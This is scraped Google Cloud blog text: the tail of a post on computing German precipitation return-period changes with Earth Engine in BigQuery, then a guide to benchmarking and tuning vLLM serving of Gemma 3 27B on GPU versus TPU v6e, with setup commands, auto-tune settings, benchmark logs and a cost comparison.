code_block: <ListValue: [StructValue([(‘code’, “– This UDF implements the Gumbel distribution formula to estimate the event magnitudern– for a given return period based on the sample mean (xbar) and standard deviation (sigma).rnCREATE TEMP FUNCTIONrnCalculateReturnPeriod(period INT64, xbar FLOAT64, sigma FLOAT64)rn RETURNS FLOAT64 AS ( ROUND(-LOG(-LOG(1 – (1 / period))) * sigma * .7797 + xbar – (.45 * sigma), 4) );rnrnrnWITHrn– Step 1: Define the analysis areas.rn– This CTE selects a specific subset of 10 major German cities.rn– ST_SIMPLIFY is used to reduce polygon complexity, improving query performance.rnCounties AS (rnFROM bigquery-public-data.overture_maps.division_arearn|> WHERE country = ‘DE’ AND subtype = ‘county’rn AND names.primary IN (rn ‘München’,rn ‘Köln’,rn ‘Frankfurt am Main’,rn ‘Stuttgart’,rn ‘Düsseldorf’)rn|> SELECTrn id,rn names.primary AS county,rn ST_SIMPLIFY(geometry,500) AS geometryrn),rn– Step 2: Define the time periods for comparison.rn– These two 30-year, overlapping epochs will be used to assess recent changes.rnEpochs AS (rn FROM UNNEST([rn STRUCT(‘e1’ AS epoch, 1980 AS start_year, 2010 AS end_year),rn STRUCT(‘e2’ AS epoch, 1994 AS start_year, 2024 AS end_year)])rn),rn– Step 3: Define the return periods to calculate.rnReturnPeriods AS (rn FROM UNNEST([10,25,50,100,500]) AS years |> SELECT *rn),rn– Step 4: Select the relevant image data from the Earth Engine catalog.rn– Replace YOUR_CLOUD_PROJECT with your relevant Cloud Project ID.rnImages AS (rn FROM YOUR_CLOUD_PROJECT.era5_land_daily_aggregated.climatern |> WHERE year BETWEEN 1980 AND 2024rn |> SELECTrn id AS img_id,rn start_datetime AS img_datern)rn– Step 5: Begin the main data processing pipeline.rn– This creates a processing task for every combination of a day and a county.rnFROM Imagesrn|> CROSS JOIN Countiesrn– Step 6: Perform zonal statistics using Earth Engine.rn– ST_REGIONSTATS calculates the mean precipitation for each county for each day.rn|> SELECTrnimg_id,rnCounties.id AS county_id,rnEXTRACT(YEAR FROM img_date) AS year,rnST_REGIONSTATS(geometry, img_id, ‘total_precipitation_sum’) AS areal_precipitation_statsrn– Step 7: Find the annual maximum precipitation.rn– This aggregates the daily results to find the single wettest day for each county within each year.rn|> AGGREGATErnSUM(areal_precipitation_stats.count) AS pixels_examined,rnMAX(areal_precipitation_stats.mean) AS yearly_max_1day_precip,rnANY_VALUE(areal_precipitation_stats.area) AS pixel_arearnGROUP BY county_id, yearrn– Step 8: Calculate statistical parameters for each epoch.rn– Joins the annual maxima to the epoch definitions and then calculates thern– average and standard deviation required for the Gumbel distribution formula.rn|> JOIN Epochs ON year BETWEEN start_year AND end_yearrn|> AGGREGATErn AVG(yearly_max_1day_precip * 1e3) AS avg_yearly_max_1day_precip,rn STDDEV(yearly_max_1day_precip * 1e3) AS stddev_yearly_max_1day_precip,rn GROUP BY county_id, epochrn– Step 9: Calculate the return period precipitation values.rn– Applies the UDF to the calculated statistics for each return period.rn– This assumes they are the same function.rn|> CROSS JOIN ReturnPeriods rprn|> EXTENDrn CalculateReturnPeriod(rp.years, avg_yearly_max_1day_precip, stddev_yearly_max_1day_precip) AS est_max_1day_preciprn|> DROP avg_yearly_max_1day_precip, stddev_yearly_max_1day_preciprn– Step 10: Pivot the data to create columns for each epoch and return period.rn– The first PIVOT transforms rows for ‘e1’ and ‘e2’ into columns for direct comparison.rn|> PIVOT (ANY_VALUE(est_max_1day_precip) AS est_max_1day_precip FOR epoch IN (‘e1’, ‘e2’))rn– The second PIVOT transforms rows for each return period (10, 25, etc.) into columns.rn|> PIVOT (ANY_VALUE(est_max_1day_precip_e1) AS e1, ANY_VALUE(est_max_1day_precip_e2) AS e2 FOR years IN (10, 25, 50, 100, 500))rn– Step 11: Re-attach county names and geometries for the final output.rn|> LEFT JOIN Counties ON county_id = Counties.idrn– Step 12: Calculate the final difference between the two epochs.rn– This creates the delta values that show the change in precipitation magnitude for each return period.rn|> SELECTrncounty,rnCounties.geometry,rne2_10 – e1_10 AS est_10yr_max_1day_precip_delta,rne2_25 – e1_25 AS est_25yr_max_1day_precip_delta,rne2_50 – e1_50 AS est_50yr_max_1day_precip_delta,rne2_100 – e1_100 AS est_100yr_max_1day_precip_delta,rne2_500 – e1_500 AS est_500yr_max_1day_precip_deltarn|> ORDER BY county”), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3ebcfc2a2ca0>)])]>

To provide quick results as a demonstration, the example query above filters for five populated counties; running the computation for all of Germany would take much longer. When running the analysis for many more geometries (areas of interest), you can break the analysis into two parts:

Calculate the historical time series of maximum daily precipitation for each county in Germany from 1980-2024 and save the resulting table.
Use these results to calculate and compare precipitation return periods for two distinct timeframes.

With the analysis complete, the results can be immediately rendered using the new Visualization feature in BigQuery Studio. This allows the insurance provider to:

Pinpoint high-risk zones: Visually identify clusters of counties with increasing extreme precipitation, for proactive risk mitigation and to optimize policy pricing.
Communicate insights: Share interactive maps with stakeholders, making complex risk assessments understandable at a glance.
Inform strategic decisions: This type of analysis is not limited to insurance. For example, a consumer packaged goods (CPG) company could use these insights to optimize warehouse and distribution center locations, situating them in areas with more stable climate conditions.

Running BigQuery analysis for changing extreme precipitation events in Germany and interactively exploring the results with the new Map visualization

This combination of Earth Engine, BigQuery, and integrated visualization helps businesses move beyond reactive measures, enabling data-driven foresight in a rapidly changing world.

The future of geospatial analysis is here

With the general availability of Earth Engine in BigQuery and the preview of map visualization, we’re helping data professionals across industries to unlock richer, more actionable insights from their geospatial data. From understanding climate risk for buildings in flood-prone areas to optimizing enterprise planning and supply chains, these tools are designed to power operational decision making, helping your business thrive in an increasingly data-driven landscape.

We are continuously working to expand the utility and accessibility of this new set of capabilities, including:

Growing catalog of datasets: Expect more datasets for both Earth Engine and BigQuery Sharing, allowing you to leverage analysis-ready datasets for individual or combined use with custom datasets.
Intelligent geospatial assistance: We envision a future where advanced AI and code generation capabilities will further streamline geospatial workflows. Stay tuned for more on this later this year!

To begin leveraging these new capabilities, explore our comprehensive documentation for Earth Engine in BigQuery and the new map visualization feature today.

Read More for the details.

2025 08 25

GCP – vLLM Performance Tuning: The Ultimate Guide to xPU Inference Configuration

Tibor Kiss Cloud, Google Cloud gcp

Additional contributors include Hossein Sarshar, Ashish Narasimham, and Chenyang Li.

Large Language Models (LLMs) are revolutionizing how we interact with technology, but serving these powerful models efficiently can be a challenge. vLLM has rapidly become the primary choice for serving open source large language models at scale, but using vLLM is not a silver bullet. Teams that are serving LLMs for downstream applications have stringent latency and throughput requirements that necessitate a thorough analysis of which accelerator to run on and what configuration offers the best possible performance.

This guide provides a bottoms-up approach to determining the best accelerator for your use case and optimizing your vLLM’s configuration to achieve the best and most cost effective results possible.

Note: This guide assumes that you are familiar with xPUs, vLLM, and the underlying features that make it such an effective serving framework.

Prerequisites

Before we begin, ensure you have:

A Google Cloud Project with billing enabled.
The gcloud command-line tool installed and authenticated.
Basic familiarity with Linux commands and Docker.
Hugging Face account, a read token and access to the Gemma 3 27B model.

Gathering Information on Your Use Case

Choosing the right accelerator can feel like an intimidating process because each inference use case is unique. There is no a priori ideal set up from a cost/performance perspective; we can’t say model X should always be run on accelerator Y.

The following considerations need to be taken into account to best determine how to proceed:

What model are you using?

Our example model is google/gemma-3-27b-it. This is a 27-billion parameter instruction-tuned model from Google’s Gemma 3 family.

What is the precision of the model you’re using?

We will use bfloat16 (BF16).

Note: Model precision determines the number of bytes used to store each model weight. Common options are float32 (4 bytes), float16 (2 bytes), and bfloat16 (2 bytes). Many models are now also available in quantized formats like 8-bit, 4-bit (e.g., GPTQ, AWQ), or even lower. Lower precision reduces memory requirements and can increase speed, but may come with a slight trade-off in accuracy.

Workload characteristics: How many requests/second are you expecting?

We are targeting support for 100 requests/second.

What is the average sequence length per request?

Input Length: 1500 tokens
Output Length: 200 tokens
The total sequence length per request is therefore 1500 + 200 = 1700 tokens on average.

What is the maximum total sequence length we will need to be able to handle?

Let’s say in this case it is 2000 total tokens

What is the GPU Utilization you’ll be using?

The gpu_memory_utilization parameter in vLLM controls how much of the xPU’s VRAM is pre-allocated for the KV cache (given the allocated memory for the model weights). By default, this is 90% in vLLM, but we generally want to set this as high as possible to optimize performance without causing OOM issues – which is how our auto_tune.sh script works (as described in the “Benchmarking, Tuning and Finalizing Your vLLM Configuration” section of this post).

What is your prefix cache rate?

This will be determined from application logs, but we’ll estimate 50% for our calculations.

Note: Prefix caching is a powerful vLLM optimization that reuses the computed KV cache for shared prefixes across different requests. For example, if many requests share the same lengthy system prompt, the KV cache for that prompt is calculated once and shared, saving significant computation and memory. The hit rate is highly application-specific. You can estimate it by analyzing your request logs for common instruction patterns or system prompts.

What is your latency requirement?

The end-to-end latency from request to final token should not exceed 10 seconds (P99 E2E). This is our primary performance constraint.

Selecting Accelerators (xPU)

We live in a world of resource scarcity! What does this mean for your use case? It means that of course you could probably get the best possible latency and throughput by using the most up to date hardware – but as an engineer it makes no sense to do this when you can achieve your requirements at a better price/performance point.

Identifying Candidate Accelerators

We can refer to our Accelerator-Optimized Machine Family of Google Cloud Instances to determine which accelerator-optimized instances are viable candidates.

We can refer to our Cloud TPU offerings to determine which TPUs are viable candidates.

The following are examples of accelerators that can be used for our workloads, as we will see in the “Calculate Memory Requirements” section.

The following options have different Tensor Parallelism (TP) configurations required depending on the total VRAM. Please see the next section for an explanation of Tensor Parallelism.

Accelerator-optimized Options

g2-standard-48

Provides 4 accelerators with 96 GB of GDDR6
TP = 4

a2-ultragpu-1g

Provides 1 accelerator with 80 GB of HBM
TP = 1

a3-highgpu-1g

Provides 1 accelerator with 80GB of HBM
TP = 1

TPU Options

TPU v5e (16 GB of HBM per chip)

v5litepod-8 provides 8 v5e TPU chips with 128GB of total HBM
TP = 8

TPU v6e aka Trillium (32 GB of HBM per chip)

v6e-4 provides 4 v6e TPU chips with 128GB of total HBM
TP = 4

Calculate Memory Requirements

We must estimate the total minimum VRAM needed. This will tell us if the model can fit on a single accelerator or if we need to use parallelism. Memory utilization can be broken down into two main components: static memory from our model weights, activations, and overhead plus the KV Cache memory.

The following tool was created to answer this question: Colab: HBM Calculator.

You can enter the information we determined above to estimate the minimum required VRAM to run our model.

Hugging Face API Key
Model Name from Hugging Face
Number of Active Parameters (billions)
The average input and output length (in tokens) for your workload.
A batch size of 1

The calculation itself is generally out of scope for this discussion, but it can be determined from the following equation:

Required xPU memory = [(model_weight + non_torch_memory + pytorch_activation_peak_memory) + (kv_cache_memory_per_batch * batch_size)] ,

where

model_weight is equal to the number of parameters x a constant depending on parameter data type/precision
non_torch_memory is a buffer for memory overhead (estimated ~1GB)
pytorch_activation_peak_memory is the memory required for intermediate activations
kv_cache_memory_per_batch is the memory required for the KV cache per batch
batch_size is the number of sequences that will be processed simultaneously by the engine

A batch size of one is not a realistic value, but it does provide us with the minimum VRAM we will need for the engine to get off the ground. You can vary this parameter in the calculator to see just how much VRAM we will need to support our larger batch sizes of 128 – 512 sequences.

In our case, we find that we need a minimum of ~57 GB of VRAM to run gemma-3-27b-it on vLLM for our specific workload.

Is Tensor Parallelism Required?

In this case, the answer is that parallelism is not necessarily required, but we could and should consider our options from a price/performance perspective. Why does it matter?

Very quickly – what is Tensor Parallelism? At the highest level, Tensor Parallelism is a method of breaking apart a large model across multiple accelerators (xPU) so that the model can actually fit on the hardware we need. See here for more information.

vLLM supports Tensor Parallelism (TP). With tensor parallelism, accelerators must constantly communicate and synchronize with each other over the network for the model to work. This inter-accelerator communication can add overhead, which has a negative impact on latency. This means we have a tradeoff between cost and latency in our case.

Note: Tensor parallelism is required for TPU’s because of the particular size of this model. v5e and v6e have 16 GB and 32 GB of HBM respectively and mentioned above, so multiple chips are required to support the model size. In this guide, v6e-4 does pay a slight performance penalty for this communication overhead while a single accelerator instance would not.

Benchmarking, Tuning and Finalizing Your vLLM Configuration

Now that you have your short list of accelerator candidates, it is time to see the best level of performance we can across each potential setup. We will only overview an anonymized accelerator-optimized instance and Trillium (v6e) benchmarking & tuning in this section – but the process would be nearly identical for the other accelerators:

Launch, SSH, Update VMs
Pull vLLM Docker Image
Update and Launch Auto Tune Script
Analyze Results

Accelerator-optimized Machine Type

In your project, open the Cloud Shell and enter the following command to launch your chosen instance and its corresponding accelerator and accelerator count. Be sure to update your project ID accordingly and select a zone that supports your machine type for which you have quota.

code_block: <ListValue: [StructValue([(‘code’, ‘export MACHINE_TYPE=xxxrnexport ACCELERATOR=xxxrnexport ACCELERATOR_COUNT=xxxrnrngcloud compute instances create vllm-test-instance \rn–zone=us-central1-a \rn–machine-type=$MACHINE_TYPE \rn–maintenance-policy=TERMINATE \rn–image-family=”pytorch-2-7-cu128-ubuntu-2204-nvidia-570″ \rn–image-project=”deeplearning-platform-release” \rn–boot-disk-size=200GB \rn–accelerator=”type=${ACCELERATOR},count=${ACCELERATOR_COUNT}” \rn–metadata=”install-nvidia-driver=True”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fdb970>)])]>

SSH into the instance.

code_block: <ListValue: [StructValue([(‘code’, ‘gcloud compute ssh vllm-test-instance –zone us-central1-a’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fdb790>)])]>

Now that we’re in our running instance, we can go ahead and pull the latest vLLM Docker image and then run it interactively. A final detail — if we are using a gated model (and we are in this demo) we will need to provide our HF_TOKEN in the container:

code_block: <ListValue: [StructValue([(‘code’, ‘# install dockerrnsudo apt update && sudo apt -y install docker.iornrn# launch containerrnsudo docker run –gpus=all -dit –privileged \rn –shm-size=16g –name vllm-serve \rn –entrypoint /bin/bash vllm/vllm-openai:latestrnrn# enter containerrnsudo docker exec -it vllm-serve bashrnrn# install required libraryrnapt-get install bcrnrn# Provide HF_TOKENrnexport HF_TOKEN=XXXXXXXXXXXXXXXXXXXXX’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fdb9d0>)])]>

In our running container, we can now find a file called vllm-workspace/benchmarks/auto_tune/auto_tune.sh that we need to update with the information we determined above to tune our vLLM configuration for the best possible throughput and latency.

code_block: <ListValue: [StructValue([(‘code’, ‘# navigate to correct directoryrncd benchmarks/auto_tunernrn# update the auto_tune.sh script – user your preferred script editorrnnano auto_tune.sh’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fdbac0>)])]>

In the auto_tune.sh script, you will need to make the following updates:

code_block: <ListValue: [StructValue([(‘code’, ‘TAG=$(date +”%Y_%m_%d_%H_%M”)rnSCRIPT_DIR=$( cd — “$( dirname — “${BASH_SOURCE[0]}” )” &> /dev/null && pwd )rnBASE=”/vllm-workspace”rnMODEL=”google/gemma-3-27b-it”rnSYSTEM=”GPU”rnTP=1rnDOWNLOAD_DIR=”/vllm-workspace/models”rnINPUT_LEN=1500rnOUTPUT_LEN=200rnMAX_MODEL_LEN=2000rnMIN_CACHE_HIT_PCT=50rnMAX_LATENCY_ALLOWED_MS=10000rnNUM_SEQS_LIST=”128 256″rnNUM_BATCHED_TOKENS_LIST=”512 1024 2048″rnrnLOG_FOLDER=”$BASE/auto-benchmark/$TAG”rnRESULT=”$LOG_FOLDER/result.txt”rnPROFILE_PATH=”$LOG_FOLDER/profile”rnrnecho “result file: $RESULT”rnecho “model: $MODEL”rnrnrm -rf $LOG_FOLDERrnrm -rf $PROFILE_PATHrnmkdir -p $LOG_FOLDERrnmkdir -p $PROFILE_PATHrnrncd “$BASE”‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fdb8e0>)])]>

Specify the model we will be using.
Specify that we are leveraging GPU in this case if we did when selecting our instance type.
Tensor Parallelism is set to 1 if we are using a machine type that only has 1 accelerator.
Specify our inputs and outputs.
Specify our 50% min_cache_hit_pct.
Specify our latency requirement.
Update our num_seqs_list to reflect a range of common values for high performance.
Update num_batched_tokens_list if necessary.
- This step willl likely not be necessary, but if a use case is particularly small or particularly large inputs/outputs, it may become necessary.
Be sure to specify the BASE, DOWNLOAD_DIR, and cd “$BASE” statement exactly as shown.

Once the parameters have been updated, launch the auto_tune.sh script.

code_block: <ListValue: [StructValue([(‘code’, ‘# launch scriptrnbash auto_tune.sh’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fbf190>)])]>

The following processes occur:

Our auto_tune.sh script downloads the required model and attempts to start a vLLM server at the highest possible gpu_utilization (0.98 by default). If a CUDA OOM occurs, we go down 1% until we find a stable configuration.

Troubleshooting Note: In rare cases, a vLLM server may be able to start during the initial gpu_utilization test but then fail due to CUDA OOM at the start of the next benchmark. Alternatively, the initial test may fail and then not spawn a follow up server resulting in what appears to be a hang. If either happens, edit the auto_tune.sh near the very end of the file so that gpu_utilization begins at 0.95 or a lower value rather than beginning at 0.98.

Then, for each permutation of num_seqs_list and num_batched_tokens, a server is spun up and our workload is simulated.

A benchmark is first run with an infinite request rate.
If the resulting P99 E2E Latency is within the MAX_LATENCY_ALLOWED_MS limit, this throughput is considered the maximum for this configuration.
If the latency is too high, the script performs a search by iteratively decreasing the request rate until the latency constraint is met. This finds the highest sustainable throughput for the given parameters and latency requirement.

In our results.txt file at /vllm-workspace/auto-benchmark/$TAG/result.txt, we will find which combination of parameters is most efficient, and then we can take a closer look at that run:

code_block: <ListValue: [StructValue([(‘code’, ‘# result.txtrnmax_num_seqs: 128, max_num_batched_tokens: 512, request_rate: 6, e2el: 7715.94, throughput: 4.16, goodput: 4.16rn——rnmax_num_seqs: 128, max_num_batched_tokens: 1024, request_rate: 6, e2el: 8327.84, throughput: 4.14, goodput: 4.14rn——rnmax_num_seqs: 128, max_num_batched_tokens: 2048, request_rate: 6, e2el: 8292.39, throughput: 4.15, goodput: 4.15rn——rnmax_num_seqs: 256, max_num_batched_tokens: 512, request_rate: 6, e2el: 7612.31, throughput: 4.17, goodput: 4.17rn——rnmax_num_seqs: 256, max_num_batched_tokens: 1024, request_rate: 6, e2el: 8277.94, throughput: 4.14, goodput: 4.14rn——rnmax_num_seqs: 256, max_num_batched_tokens: 2048, request_rate: 6, e2el: 8234.81, throughput: 4.15, goodput: 4.15’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46feb580>)]), StructValue([(‘code’, ‘# bm_log_256_512_requestrate_6.txtrn============ Serving Benchmark Result ============rnSuccessful requests: 100 rnBenchmark duration (s): 24.01 rnTotal input tokens: 149900 rnTotal generated tokens: 20000 rnRequest throughput (req/s): 4.17 rnRequest goodput (req/s): 4.17 rnOutput token throughput (tok/s): 833.11 rnTotal Token throughput (tok/s): 7077.26 rn—————Time to First Token—————-rnMean TTFT (ms): 142.26 rnMedian TTFT (ms): 124.93 rnP99 TTFT (ms): 292.74 rn—–Time per Output Token (excl. 1st token)——rnMean TPOT (ms): 33.53 rnMedian TPOT (ms): 33.97 rnP99 TPOT (ms): 37.41 rn—————Inter-token Latency—————-rnMean ITL (ms): 33.53 rnMedian ITL (ms): 29.62 rnP99 ITL (ms): 53.84 rn—————-End-to-end Latency—————-rnMean E2EL (ms): 6814.22 rnMedian E2EL (ms): 6890.45 rnP99 E2EL (ms): 7612.31 rn==================================================’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46feb9d0>)])]>

Let’s look at the best-performing result to understand our position:

max_num_seqs: 256, max_num_batched_tokens: 512

These were the settings for the vLLM server during this specific test run.

request_rate: 6

This is the final input from the script’s loop. It means your script determined that sending 6 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 7 req/s, the latency was too high.

e2el: 7612.31

This is the P99 latency that was measured when the server was being hit with 6 req/s. Since 7612.31 is less than 10000, the script accepted this as a successful run.

throughput: 4.17

This is the actual, measured output. Even though you were sending requests at a rate of 6 per second, the server could only successfully process them at a rate of 4.17 per second.

TPU v6e (aka Trillium)

Let’s do the same optimization process for TPU now. You will find that vLLM has a robust ecosystem for supporting TPU-based inference and that there is little difference between how we execute TPU benchmarking and the previously described process.

First we’ll need to launch and configure networking for our TPU instance – in this case we can use Queued Resources. Back in our Cloud Shell, use the following command to deploy a v6e-4 instance. Be sure to select a zone where v6e is available.

code_block: <ListValue: [StructValue([(‘code’, ‘# Create instancerngcloud compute tpus queued-resources create $NAME \rn –node-id $NAME \rn –project $PROJECT \rn –zone $ZONE \rn –accelerator-type v6e-4 \rn –runtime-version v2-alpha-tpuv6ernrn# Create firewall rulerngcloud compute firewall-rules create open8004 \rn –project=$PROJECT \rn –direction=INGRESS \rn –priority=1000 \rn –network=default \rn –action=ALLOW \rn –rules=tcp:8004 \rn –source-ranges=0.0.0.0/0 \rn –target-tags=open8004rnrn# Apply tag to VMrngcloud compute tpus tpu-vm update $NAME \rn –zone $ZONE \rn –project $PROJECT \rn –add-tags open8004’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fc8e50>)])]>

To monitor the status of your request:

code_block: <ListValue: [StructValue([(‘code’, ‘# Monitor creationrngcloud compute tpus queued-resources list –zone $ZONE –project $PROJECT’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fc8fd0>)])]>

Wait for the TPU VM to become active (status will update from PROVISIONING to ACTIVE). This might take some time depending on resource availability in the selected zone.

SSH directly into the instance with the following command:

code_block: <ListValue: [StructValue([(‘code’, ‘gcloud compute tpus tpu-vm ssh $NAME –zone $ZONE –project $PROJECT’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fc8ac0>)])]>

Now that we’re in, pull the vLLM-TPU Docker image, launch our container, and exec into the container:

code_block: <ListValue: [StructValue([(‘code’, ‘sudo docker pull docker.io/vllm/vllm-tpu:nightlyrnrnsudo docker run -dit \rn –name vllm-serve –net host –privileged \rn –entrypoint /bin/bash vllm/vllm-tpu:nightlyrnrnsudo docker exec -it vllm-serve bash’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fc89d0>)])]>

Again, we will need to install a dependency, provide our HF_TOKEN and update our auto-tune script as we did above with our other machine type.

code_block: <ListValue: [StructValue([(‘code’, ‘# Head to main working directoryrncd benchmarks/auto_tune/rnrn# install required libraryrnapt-get install bcrnrn# Provide HF_TOKENrnexport HF_TOKEN=XXXXXXXXXXXXXXXXXXXXXrnrn# update auto_tune.sh with your preferred script editor and launch auto_tunerrnnano auto_tune.sh’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fc8b20>)])]>

We will want to make the following updates to the vllm/benchmarks/auto_tune.sh file:

code_block: <ListValue: [StructValue([(‘code’, ‘TAG=$(date +”%Y_%m_%d_%H_%M”)rnSCRIPT_DIR=$( cd — “$( dirname — “${BASH_SOURCE[0]}” )” &> /dev/null && pwd )rnBASE=”/workspace”rnMODEL=”google/gemma-3-27b-it”rnSYSTEM=”TPU”rnTP=4rnDOWNLOAD_DIR=”/workspace/models”rnINPUT_LEN=1500rnOUTPUT_LEN=200rnMAX_MODEL_LEN=2000rnMIN_CACHE_HIT_PCT=50rnMAX_LATENCY_ALLOWED_MS=10000rnNUM_SEQS_LIST=”128 256″rnNUM_BATCHED_TOKENS_LIST=”512 1024 2048″‘), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fc8d00>)])]>

And then execute:

code_block: <ListValue: [StructValue([(‘code’, ‘bash auto_tune.sh’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fc8d60>)])]>

As our auto_tune.sh executes we determine the largest possible gpu_utilization value our server can run on and then cycle through the different num_batched_tokens parameters to determine which is most efficient.

Troubleshooting Note: It can take a longer amount of time to start up a vLLM engine on TPU due to a series of compilation steps that are required. In some cases, this can go longer than 10 minutes – and when that occurs the auto_tune.sh script may kill the process. If this happens, update the start_server() function such that the for loop sleeps for 30 seconds rather than 10 seconds as shown here:

code_block: <ListValue: [StructValue([(‘code’, ‘start_server() {rnrn…rnrn for i in {1..60}; do rn RESPONSE=$(curl -s -X GET “http://0.0.0.0:8004/health” -w “%{http_code}” -o /dev/stdout)rn STATUS_CODE=$(echo “$RESPONSE” | tail -n 1) rn if [[ “$STATUS_CODE” -eq 200 ]]; thenrn server_started=1rn breakrn elsern sleep 10 # UPDATE TO 30 IF VLLM ENGINE START TAKES TOO LONGrn firn donern if (( ! server_started )); thenrn echo “server did not start within 10 minutes. Please check server log at $vllm_log”.rn return 1rn elsern return 0rn firn}’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fc8a60>)])]>

The outputs are printed as our program executes and we can also find them in log files at $BASE/auto-benchmark/TAG. We can see in these logs that our current configurations are still able to achieve our latency requirements.

Again we can observe our results.txt file:

code_block: <ListValue: [StructValue([(‘code’, ‘# request.txtrnmax_num_seqs: 128, max_num_batched_tokens: 512, request_rate: 9, e2el: 8549.13, throughput: 5.59, goodput: 5.59rn——rnmax_num_seqs: 128, max_num_batched_tokens: 1024, request_rate: 9, e2el: 9375.51, throughput: 5.53, goodput: 5.53rn——rnmax_num_seqs: 128, max_num_batched_tokens: 2048, request_rate: 9, e2el: 9869.43, throughput: 5.48, goodput: 5.48rn——rnmax_num_seqs: 256, max_num_batched_tokens: 512, request_rate: 9, e2el: 8423.40, throughput: 5.63, goodput: 5.63rn——rnmax_num_seqs: 256, max_num_batched_tokens: 1024, request_rate: 9, e2el: 9319.26, throughput: 5.54, goodput: 5.54rn——rnmax_num_seqs: 256, max_num_batched_tokens: 2048, request_rate: 9, e2el: 9869.08, throughput: 5.48, goodput: 5.48’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fc88e0>)])]>

And the corresponding metrics for our best run:

code_block: <ListValue: [StructValue([(‘code’, ‘# bm_log_256_512_requestrate_9.txtrnrnTraffic request rate: 9.0 RPS.rnBurstiness factor: 1.0 (Poisson process)rnMaximum request concurrency: Nonern============ Serving Benchmark Result ============rnSuccessful requests: 100 rnBenchmark duration (s): 17.75 rnTotal input tokens: 149900 rnTotal generated tokens: 20000 rnRequest throughput (req/s): 5.63 rnRequest goodput (req/s): 5.63 rnOutput token throughput (tok/s): 1126.50 rnTotal Token throughput (tok/s): 9569.63 rn—————Time to First Token—————-rnMean TTFT (ms): 178.27 rnMedian TTFT (ms): 152.43 rnP99 TTFT (ms): 379.75 rn—–Time per Output Token (excl. 1st token)——rnMean TPOT (ms): 37.28 rnMedian TPOT (ms): 37.51 rnP99 TPOT (ms): 41.47 rn—————Inter-token Latency—————-rnMean ITL (ms): 37.28 rnMedian ITL (ms): 36.27 rnP99 ITL (ms): 51.39 rn—————-End-to-end Latency—————-rnMean E2EL (ms): 7597.10 rnMedian E2EL (ms): 7692.51 rnP99 E2EL (ms): 8423.40 rn==================================================’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e1d46fc8850>)])]>

Let’s look at the best-performing result to understand our position:

max_num_seqs: 256, max_num_batched_tokens: 512

These were the settings for the vLLM server during this specific test run.

request_rate: 9

This is the final input from the script’s loop. It means your script determined that sending 9 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 10 req/s, the latency was too high.

e2el: 8423.40

This is the P99 latency that was measured when the server was being hit with 9 req/s. Since 8423.40 is less than 10,000, the script accepted this as a successful run.

throughput: 5.63

This is the actual, measured output. Even though you were sending requests at a rate of 9 per second, the server could only successfully process them at a rate of 5.63 per second.

Calculating Performance-Cost Ratio

Now that we have tuned and benchmarked our two primary accelerator candidates, we can bring the data together to make a final, cost-based decision. The goal is to find the most economical configuration that can meet our workload requirement of 100 requests per second while staying under our P99 end-to-end latency limit of 10,000 ms.

We will analyze the cost to meet our 100 req/s target using the best-performing configuration for both the anonymized candidate and the TPU v6e.

Anonymized Accelerator-optimized Candidate

Measured Throughput: The benchmark showed a single vLLM engine achieved a throughput of 4.17 req/s.
Instances Required: To meet our 100 req/s goal, we would need to run multiple instances. The calculation is:
- Target Throughput / Throughput Per Instance = 100 req/s ÷ 4.17 req/s ≈ 23.98
- Since we can’t provision a fraction of an instance, we must round up to 24 instances.
Estimated Cost: As of July 2025, the spot price for our anonymized machine type in us-central1 was approximately $2.25 per hour. The total hourly cost for our cluster would be: 24 instances × $2.25/hr = $54.00/hr
- Note: We are choosing Spot instance pricing for the simple cost figures, this would not be a typical provisioning pattern for this type of workload.

Google Cloud TPU v6e (v6e-4)

Measured Throughput: The benchmark showed a single v6e-4 vLLM engine achieved a higher throughput of 5.63 req/s.
Instances Required: We perform the same calculation for the TPU cluster:

Target Throughput ÷ Throughput per Instance = 100 req/s ÷ 5.63 req/s ≈ 17.76
Again, we must round up to 18 instances to strictly meet the 100 req/s requirement.

Estimated Cost: As of July 2025, the spot price for a v6e-4 queued resource in us-central1 is approximately $0.56 per chip per hour. The total hourly cost for this cluster would be:

18 instances × 4 chips x $0.56/hr = $40.32/hr

Conclusion: The Most Cost-Effective Choice

Let’s summarize our findings in a table to make the comparison clear.

Metric	Anonymized Candidate	TPU (v6e-4)
Throughput per Instance	4.17 req/s	5.63 req/s
Instances Needed (100 req/s)	24	18
Spot Instance Cost Per Hour	$2.25 / hour	$0.56 x 4 chips = $2.24 / hour
Spot Cost Total	$54.00 / hour	$40.32 / hour
Total Monthly Cost (730h)	~ $39,400	~ $29,400

The results are definitive. For this specific workload (serving the gemma-3-27b-it model with long contexts), the v6e-4 configuration is the winner.

Not only does the v6e-4 instance provide higher throughput than our accelerator-optimized instance, but it does so at a reduced cost. This translates to massive savings at higher scales.

Looking at the performance-per-dollar, the advantage is clear:

Anonymized Candidate: 4.17 req/s ÷ $54.00/hr ≈ 0.08 req/s per dollar-hour
TPU v6e: 5.63 req/s ÷ $40.32/hr ≈ 0.14 req/s per dollar-hour

The v6e-4 configuration delivers almost twice the performance for every dollar spent, making it the superior, efficient choice for deploying this workload.

